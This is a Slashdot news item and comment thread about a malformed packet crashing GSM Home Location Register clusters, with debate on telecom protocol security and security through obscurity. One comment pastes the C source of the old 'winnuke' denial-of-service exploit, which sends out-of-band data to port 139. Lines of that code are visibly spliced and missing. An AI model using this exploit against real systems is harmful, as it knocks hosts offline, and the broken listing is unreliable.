
Lone Packet Crashes Telco Networks

Soulskill posted more than 2 years ago | from the sharpshooting-with-information dept.


mask.of.sanity writes "A penetration tester has shown that GSM communications systems can be taken down with a handful of malformed packets. The weakness was in the lack of security around the Home Location Register server clusters which store GSM subscriber details as part of the global SS7 network. A single packet, sent from within any network including femtocells, took down one of the clusters for two minutes."


Hardly surprising... (3, Informative)

jonwil (467024) | more than 2 years ago | (#41630819)

Cellular standards like GSM and UMTS (no idea about other standards like LTE or CDMA) are not designed to be secure. They are designed to be complex to implement and to use as many pieces of patented technology as possible.

Re:Hardly surprising... (3, Informative)

Another, completely (812244) | more than 2 years ago | (#41630925)

They do have security designed in, but it's the hard-outer-shell variety. Doesn't GSM authenticate handsets by having the home register send a challenge along with the appropriate response in a plain-text packet to the cell? The first GSM "attack" I heard about involved connecting your fake phone to a cell, and listening to the microwave channel to hear what response you should send when it sends a challenge. It doesn't sound like a clever design, but I suppose it was trying to reduce communication and memory requirements at the home register?

Re:Hardly surprising... (1)

Fnord666 (889225) | more than 2 years ago | (#41633021)

They do have security designed in, but it's the hard-outer-shell variety.

Isn't that the M&M security method with a hard outer shell and a soft creamy center?

Re:Hardly surprising... (5, Insightful)

Severus Snape (2376318) | more than 2 years ago | (#41630975)

You surely can't be that naive and must be trolling. GSM masts are critical pieces of infrastructure in mobile telecoms and it's in every stakeholder's interest that they are secure and reliable. It's security researchers' jobs to find these holes; if they were so poorly designed we'd see stories like this every day.

Re:Hardly surprising... (4, Informative)

queazocotal (915608) | more than 2 years ago | (#41631183)

Well, no.

The barrier to entry for a firefox security hole is really, really low.
Typically anyone with a computer can do it, with no external equipment.
In addition, it's typically legal to do. (though that may not stop some).

Knowledge of how tcp/ip and similar standards work is widespread, and lots of people know this.

For hacking cell networks, it's a bit different.

It's basically a completely different set of protocol stacks unrelated to tcp/ip - so you have to learn a whole bunch to even attempt it.
You need a few thousand dollars (this may have come down slightly) of specialised equipment to do the attack.
You are doing something that is often illegal, or of dubious legality at best.

All of these combine to make the pool of attackers orders of magnitude smaller.

Re:Hardly surprising... (4, Interesting)

Gerald (9696) | more than 2 years ago | (#41631289)

The barrier for GSM is getting lower every day [osmocom.org] so it wouldn't surprise me if bugs like this start showing up more often.

Re:Hardly surprising... (4, Insightful)

Megane (129182) | more than 2 years ago | (#41631331)

It's basically a completely different set of protocol stacks unrelated to tcp/ip - so you have to learn a whole bunch to even attempt it. You need a few thousand dollars (this may have come down slightly) of specialised equipment to do the attack. You are doing something that is often illegal, or of dubious legality at best.

What you are talking about is security through obscurity, [wikipedia.org] which is of dubious security at best.

Re:Hardly surprising... (2, Informative)

geekoid (135745) | more than 2 years ago | (#41631475)

Security through obscurity is a perfectly fine layer of security.

Re:Hardly surprising... (4, Insightful)

grcumb (781340) | more than 2 years ago | (#41631733)

"Security through obscurity is a perfectly fine extra layer of security."

FTFY

In other words: If you're relying on obscurity, you're doing it wrong.

Re:Hardly surprising... (2)

DarkOx (621550) | more than 2 years ago | (#41633035)

No, it's not fine as a layer, and yes, if you rely on it you are most certainly doing it wrong. While I'll agree it might be best not to publish your network diagrams and similar, as that might just be inviting trouble, your components should not be secret.

It can take way less time than you might be inclined to think for a skilled cracker to develop a vulnerability. If they get their foot in the door anywhere, that obscure device or software component might well be their easiest path to escalated privileges. Since few use it and few have access, the weaknesses have not been exposed, and patches and mitigation strategies not developed. It ends up in many cases being easy prey for a 0-day.

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41633191)

No, it's not fine as a layer, and yes, if you rely on it you are most certainly doing it wrong.

A single layer is not a whole system.

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41634371)

The "extra" you added is redundant and implied by the parent's use of the word "layer".

Here is a link for you to brush up on your writing skills. http://writingguide.geneseo.edu/?pg=topics/luciditysimplicity.html

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41632129)

Security by obscurity is perfectly cromulent and can embiggen anyone's security system.

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41632241)

Encryption is just security through obscurity anyway.

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41632719)

What you are talking about is security through obscurity, which is of dubious security at best.

Yet look how long this model has worked for Apple with OS X.

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41634853)

Er, that wasn't "security through obscurity" so much as "security through no-one caring enough about a few OS X machines to bother targeting them"(!)

Re:Hardly surprising... (1)

SleazyRidr (1563649) | more than 2 years ago | (#41634665)

Actually I thought he was talking about how bad the mobile networks are. The comment to which he was replying said that there are a lot of people trying to find these holes, so we'd find them all, but really there aren't that many people in a position to look for the holes, thus many will go unfound.

Re:Hardly surprising... (2, Interesting)

camperdave (969942) | more than 2 years ago | (#41632173)

You need a few thousand dollars (this may have come down slightly) of specialised equipment to do the attack.

Specialized equipment? You can probably do it with a cheap Android cell phone and some warez.

Re:Hardly surprising... (4, Interesting)

queazocotal (915608) | more than 2 years ago | (#41633125)

In essentially all Android and other phones, the 'modem' runs on a separate processor, running its own OS, signed.
'Owning' the base Android phone does nothing.
You need to separately crack the modem (unlocking is not cracking).
The modem in most phones is basically a Hayes-compatible modem, with a weird interface soldered onto the board.
The only interface the Android side has to it is 'AT' commands.
It can't inject raw packets, or ...

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41634535)

Mod UP!

Re:Hardly surprising... (1)

kelemvor4 (1980226) | more than 2 years ago | (#41631455)

Cellular standards like GSM and UMTS (no idea about other standards like LTE or CDMA) are not designed to be secure. They are designed to be complex to implement and to use as many pieces of patented technology as possible.

Not to mention they were designed in 1990, and anything above only a minimal level of security is "optional". The world (or the parts of it that still use GSM) needs to move on.

Re:Hardly surprising... (3, Insightful)

scamper_22 (1073470) | more than 2 years ago | (#41631757)

Or there's a much simpler explanation... people who design protocols make tradeoffs or don't care about security.

Most of the Internet protocols were designed in a relatively open way. Are they secure?

Have you perhaps taken a look at SMTP, HTTP... heck even TCP isn't really secure. There's no authentication.

Now yes, things have been built on top of things and security added on and more focused on... but really...

In any case, just looking at history in the internet space, I think the lack of security has more to do with tradeoffs and trying to get things out quickly than any grand plan for patents.

Re:Hardly surprising... (4, Interesting)

camperdave (969942) | more than 2 years ago | (#41632139)

Security is a presentation layer issue. SMTP, HTTP and TCP are not session layer protocols, and have no business worrying about security.

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41632577)

Security is a presentation layer issue.
SMTP, HTTP and TCP are not session layer protocols, and have no business worrying about security.

Security can often be a collaboration between layers.
While you want authentication as high up in the stack as you can get it, lower layers may have a role to play in implementation.

Layer purism does not work in the real world. Sometimes inter-layer dependencies, including lower-layer dependencies, are necessary to get the job done.

For example SMTP STARTTLS signals a TLS layer be injected under SMTP.

HTTP SERVER_PORT_SECURE header is necessary to transport security state of layers under HTTP to layers above HTTP.

Re:Hardly surprising... (4, Insightful)

DarkOx (621550) | more than 2 years ago | (#41633129)

Well, yes and no. Authentication, confidentiality, and forms of integrity are session or higher layer problems. Availability is also a key component of security. You can't tell me issues like ye olde LAND attack, teardrop, ping of death, negative sequence numbers etc. don't cause availability problems, and they are decidedly network and transport layer. If I can cut your wire to jam your airwaves, that's a physical layer issue.

Not quite.... (1)

Anonymous Coward | more than 2 years ago | (#41635065)

Security probably needs to exist at all layers of the OSI model.

It is true that some forms of security, relating to user data or user transactions, apply at the higher level and thus belong up in the topmost OSI network model layers.

On the other hand, if your lower layers are compromised, channel availability is lost or data is compromised. You can't exactly ignore that sort of security at the lower layers.

Every layer needs enough security so as to not be easily compromised.

Also note that the Internet was always meant to be a system of stacked protocols. We have things like SSL (okay, not perfect, has some flaws of its own) through which we can tunnel TCP/IP traffic. The SSL provides a lot of the security. A lot, but not all. You may note that TCP/IP design or implementation issues have caused critical network unavailability and what amount to security fixes have also been applied there. So even in a layered world, security still needs to exist throughout the protocol stack.

A protocol stack is only as strong as its weakest layer.

Re:Hardly surprising... (0)

Anonymous Coward | more than 2 years ago | (#41632431)

Cellular standards like GSM and UMTS (no idea about other standards like LTE or CDMA) are not designed to be secure. They are designed to be complex to implement and to use as many pieces of patented technology as possible.

What utter BS. You don't know what you are talking about. The standards were designed for interoperability...so that the Ericsson HLR can work with the Nortel SCP and the Alcatel base stations. This was less so for the American "standards" (e.g. CDMA) which were not so interoperable (these "standards" were controlled by two companies - Qualcomm at the base station level and Telcordia for the network).

Re:Hardly surprising... (1)

Cyberax (705495) | more than 2 years ago | (#41638227)

Not really. Telecom standards are an example of natural evolution of very long-living standards (consider this: phone networks predate the Internet itself!) and carry a lot of interoperability baggage. Besides, lots of modern standards were designed in the 80s and so they rely on contemporary technologies like ASN, which makes them hard to implement but is entirely understandable.

A missing break statement (2, Informative)

Anonymous Coward | more than 2 years ago | (#41630935)

A missing break statement was what brought down the eastern phone network in North America about 20 years ago. And the same simple problem seems to happen again.

Code samples? (-1, Troll)

GameboyRMH (1153867) | more than 2 years ago | (#41630961)

Can I haz?

The Lone Packet Crashed My Network (3, Funny)

Anonymous Coward | more than 2 years ago | (#41630967)

I was wondering why my router was playing the William Tell Overture.

What was in this packet? (3, Funny)

Anonymous Coward | more than 2 years ago | (#41630983)

Taco Bell Fire Sauce?

The malformed packet was... (-1)

Anonymous Coward | more than 2 years ago | (#41630989)

------ BEGIN PACKET -----
FR1ST P0ST!!!1
------ END PACKET -------

Re:The malformed packet was... (1)

Megane (129182) | more than 2 years ago | (#41631433)

Nope, it was actually:

+++ATH0

The RF portion of the standards is well designed (4, Interesting)

exabrial (818005) | more than 2 years ago | (#41631131)

The RF portion of the standards is well designed (take LTE with orthogonal multiplexing for example). However, the systems and switching part is waaay too complex. Telco providers are buried under mountains of technical debt... Even the systems part of LTE is complex: the American implementations from Sprint and Verizon are not compatible because they cherry-picked what parts they felt like implementing.

Re:The RF portion of the standards is well designe (2, Funny)

fuzzyfuzzyfungus (1223518) | more than 2 years ago | (#41631603)

Thankfully there are no examples of 'inter-networking' actually working in the wild, much less crazy stuff like hardware that can connect easily to almost any of those 'inter-networked' networks through standardized interfaces and protocols, so we can cut them some slack for failing to achieve such an absurdly difficult task...

Re:The RF portion of the standards is well designe (1, Troll)

jonwil (467024) | more than 2 years ago | (#41631663)

GSM, UMTS and LTE are not complex because they need to be, they are complex because a lot of entities with massive patent portfolios spent billions of dollars ensuring that they are complex (by finding ways to get as many of their patents as possible into the standards)

Re:The RF portion of the standards is well designe (0)

Anonymous Coward | more than 2 years ago | (#41632785)

GSM, UMTS and LTE are not complex because they need to be, they are complex because a lot of entities with massive patent portfolios spent billions of dollars ensuring that they are complex (by finding ways to get as many of their patents as possible into the standards)

BS, you have no idea about what you are talking about. The standards are complex because they are designed for interoperability and extendability (a set of "capabilities" which can be used to create complex telecommunication services).

Re:The RF portion of the standards is well designe (1)

fuzzyfuzzyfungus (1223518) | more than 2 years ago | (#41638947)

I suspect that the telco desire to resist moving intelligence to the edges of the network has something to do with it. Ye olde intertubes are not so dumb as they seem; but they are rather closer to just carrying packets and leaving the rest to consenting adults than the cell networks are.

Re:The RF portion of the standards is well designe (1)

exabrial (818005) | more than 2 years ago | (#41633345)

I think the best example of inter-networking is worldwide GSM actually. You can take a GSM phone all over Europe and roam just fine.

I usually... (3, Funny)

phil_aychio (2438214) | more than 2 years ago | (#41631263)

do my penetration testing with my malformed package

Re:I usually... (1)

Anonymous Coward | more than 2 years ago | (#41631509)

Your hand accommodates about anything, doesn't it?

Re:I usually... (0)

Anonymous Coward | more than 2 years ago | (#41632127)

Your hand accommodates about anything, doesn't it?

Only for ports that are in promiscuous mode.

Sometimes you don't even need a malformed packet (4, Interesting)

Anonymous Coward | more than 2 years ago | (#41631747)

When I was testing a broadband access server at my first job, I saw a case where a ping with an explicitly specified packet size of 0 caused a divByZeroException on the receiving end. I couldn't resist reporting this bug in person to see the reaction on the developer's face. It was priceless. =)
Someone else had also found a TFTP packet of death; when broadcast, all boxes under test crashed.
Now when you factor in maliciously malformed packets, it doesn't surprise me at all that these things happen.
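The zero-size ping above is a sender-supplied length field reaching a division. As an added example (not code from the comment, nor from any product it mentions), here is a constructed echo-style packet format where a naive receiver trusts the declared chunk size, beside a parser that validates every header field before any arithmetic depends on it; the wire format, field names and the MAX_PAYLOAD limit are invented for illustration.

```c
#include <stdint.h>
#include <stddef.h>

/* Constructed wire format for this example (not a real protocol):
 *   byte 0    : type (1 = echo request)
 *   byte 1    : flags
 *   bytes 2-3 : chunk_size, big-endian; chunk size the sender asks the echo to use
 *   bytes 4-5 : payload_len, big-endian; number of payload bytes after the header
 */
#define HDR_LEN 6
#define MAX_PAYLOAD 1024   /* assumed receiver buffer limit */

enum parse_result {
    PKT_OK = 0,
    PKT_TRUNCATED,      /* shorter than the fixed header */
    PKT_BAD_LENGTH,     /* declared payload length != bytes actually present */
    PKT_ZERO_CHUNK,     /* chunk_size == 0: would divide by zero downstream */
    PKT_CHUNK_TOO_BIG   /* chunk_size larger than the receiver will buffer */
};

struct echo_pkt {
    uint8_t type, flags;
    uint16_t chunk_size, payload_len;
    const uint8_t *payload;
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Validate every header field before anything downstream uses it. */
enum parse_result parse_echo(const uint8_t *buf, size_t len, struct echo_pkt *out)
{
    if (len < HDR_LEN) return PKT_TRUNCATED;
    out->type = buf[0];
    out->flags = buf[1];
    out->chunk_size = rd16(buf + 2);
    out->payload_len = rd16(buf + 4);
    out->payload = buf + HDR_LEN;
    if ((size_t)out->payload_len != len - HDR_LEN) return PKT_BAD_LENGTH;
    if (out->chunk_size == 0) return PKT_ZERO_CHUNK;
    if (out->chunk_size > MAX_PAYLOAD) return PKT_CHUNK_TOO_BIG;
    return PKT_OK;
}

/* Naive receiver, kept only to show the defect: it trusts chunk_size, so a
 * declared 0 is an integer division by zero (SIGFPE on x86), the crash the
 * comment describes. Never call it on untrusted input. */
int chunk_count_naive(const uint8_t *buf, size_t len)
{
    uint16_t chunk_size = rd16(buf + 2);
    return (int)((len - HDR_LEN) / chunk_size);
}

/* Hardened receiver: parse and validate first, divide only afterwards.
 * Returns the number of chunks (rounded up), or -1 for a rejected packet. */
int chunk_count_checked(const uint8_t *buf, size_t len)
{
    struct echo_pkt p;
    if (parse_echo(buf, len, &p) != PKT_OK) return -1;
    return (int)((p.payload_len + p.chunk_size - 1) / p.chunk_size);
}

/* Constructed sample packets: a valid one, one with chunk_size 0, one truncated. */
static const uint8_t GOOD_PKT[]  = {1, 0, 0x00, 0x04, 0x00, 0x0A,
                                    'a','b','c','d','e','f','g','h','i','j'};
static const uint8_t ZERO_PKT[]  = {1, 0, 0x00, 0x00, 0x00, 0x03, 'x','y','z'};
static const uint8_t SHORT_PKT[] = {1, 0, 0x00};

/* Feed the samples through the hardened receiver; returns how many it rejected. */
int count_rejected(void)
{
    int rejected = 0;
    if (chunk_count_checked(GOOD_PKT,  sizeof GOOD_PKT)  < 0) rejected++;
    if (chunk_count_checked(ZERO_PKT,  sizeof ZERO_PKT)  < 0) rejected++;
    if (chunk_count_checked(SHORT_PKT, sizeof SHORT_PKT) < 0) rejected++;
    return rejected;
}
```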

Kinda reminds me of this (1)

kurt555gs (309278) | more than 2 years ago | (#41631943)

/* winnuke.c - (05/07/97) By _eci */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#define dport 139 /* Attack port: 139 is what we want */

int x, s;
char *str = "Bye"; /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;

int open_sock(int sock, char *server, int port) {
    struct sockaddr_in blah;
    struct hostent *he;
    bzero((char *)&blah,sizeof(blah));
    blah.sin_family=AF_INET;
    blah.sin_addr.s_addr=inet_addr(server);
    blah.sin_port=htons(port);

    if ((he = gethostbyname(server)) != NULL) {
        bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
    }
    else {
        if ((blah.sin_addr.s_addr = inet_addr(server)) \n",argv[0]);
        exit(0);
    }

    if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
    }

    open_sock(s,argv[1],dport);

    printf("Sending crash... ");
    send(s,str,strlen(str),MSG_OOB);
    usleep(100000);
    printf("Done!\n");
    close(s);
}

I'm sorry (1)

fustakrakich (1673220) | more than 2 years ago | (#41632655)

But this sounds more like a feature...

Remember the Ping-O-Death (3, Interesting)

xmas2003 (739875) | more than 2 years ago | (#41632811)

Us old farts will remember something similar called the Ping-O-Death! ;-) [wikipedia.org]

Re:Remember the Ping-O-Death (1)

Amouth (879122) | more than 2 years ago | (#41634523)

That was always fun to do in the labs, so much fun.

Marketers are listening (0)

Anonymous Coward | more than 2 years ago | (#41632813)

I go for many days between calls on my pay-as-you-go Nexus S. Mostly I use skype to communicate with folks so the phone isn't used much as a phone.

Last few years I've noticed a correlation between phone activity and unsolicited marketing calls. Once a day shortly after I take a call I'll get a robocall from some mortgage refinance outfit.

They're listening to radio traffic to target GSM phones that are likely to complete the calls. That or t-mobile is selling call records in real-time to marketers.

They should use the security flag (0)

Anonymous Coward | more than 2 years ago | (#41632861)

https://tools.ietf.org/html/rfc3514

Authorities deny second packet, let truth prevail! (1)

Pvt_Waldo (459439) | more than 2 years ago | (#41633001)

Check the Zapruder trace man, there was clearly a second packet on the grassy knoll! If you trace the first one, it came in via the ethernet port, out the USB, then back in via an SD card - which I say is impossible. Had to be a second packet.

FUD (0)

Anonymous Coward | more than 2 years ago | (#41633019)

FUD by some self-proclaimed security expert; I wonder how he is able to send SS7 packets from a cell site :)
SS7 doesn't reach cell sites, only down to BSCs.

I also think it should be kept in mind that GSM technology was standardised in the late eighties, and big players such as AT&T have already started shutting down their GSM networks.

Someone is seeking attention.

The reason for this is (1)

kilodelta (843627) | more than 2 years ago | (#41633499)

When Signalling System 7 (SS7) specifications were written, there was no assumption that anyone other than a proper telco could access the network. Of course equal access provisions and telephony developments have peeled back the layers separating the user from the signalling pattern.

Kind of how the Bell System used audio tones to control network functions until finally moving to out of band signalling.

Their thinking at the time was that it offered a solution for sending information across the voice network and that most of the public wouldn't have access to the equipment of a tolerance necessary to generate and interpret those tones. They were very wrong about that part. But more astounding, they published details of the system in their technical publications. So it was sort of naive of them to think nobody would ever hack into the Bell System.

The same is true in the field of other utilities like electric and gas generation and distribution. Look at SCADA - someone got the bright idea to tie SCADA to the network for ease of management. And then all of a sudden they acted all surprised when people started poking around. And as someone familiar with the NERC specifications - the real upshot of NERC is to log for forensics. There's no active prevention per se.

AMPS was the best (0)

Anonymous Coward | more than 2 years ago | (#41634717)

AMPS was the best cell phone scheme. It would travel for miles and would always have a signal even in the sticks. GSM sucks, it isn't reliable in rural areas. CDMA is better than GSM and TDMA but no way competes with AMPS in range. And with AMPS there were no 'packet' issues, there was no internet either with AMPS but that made it safer.

Recent GSM blackout (0)

Anonymous Coward | more than 2 years ago | (#41637425)

It reminds me of a recent major GSM blackout:
http://www.computerworlduk.com/news/mobile-wireless/3368648/orange-mobile-database-flaw-affects-26-million-in-france/

Could it be related?

Meh (1)

Lord Strongpants (2751893) | more than 2 years ago | (#41640393)

Random magazine reports on talk at random conference by random pen tester dude who sez "Wow the world's telco networks are so insecure like I've hacked them heaps of times I'm pretty 1337" (I'm paraphrasing a bit but that's basically it). Well ... meh. Although, point that world's telco networks are pretty insecure, and the main limiting factor on the amount of hacking going on is just the amount of people who bother trying, is valid. Cheers.

Attention seekers (0)

Anonymous Coward | more than 2 years ago | (#41642125)

I was looking through the slides and I saw a lot of screenshots from Ericsson nodes and lots of boasts such as "SMS is easy to intercept"... But no real proof of actual penetration or interception.

Like the slide with the title "printing money": they show a screenshot of someone defining vouchers in the Ericsson charging system. Yes, if you have access to the node you can provision vouchers for prepaid top-ups; the tricky part is how do you get access to a node that isn't connected to the Internet?

It was mostly a lot of BS, Captain Crunch etc.; it was a while since that was an actual vector.
